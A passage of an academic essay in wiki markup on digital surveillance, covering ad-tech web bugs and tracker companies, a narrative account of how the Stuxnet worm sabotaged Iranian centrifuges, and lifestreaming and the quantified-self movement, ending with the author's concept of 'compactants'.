*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. 
The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. 
Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
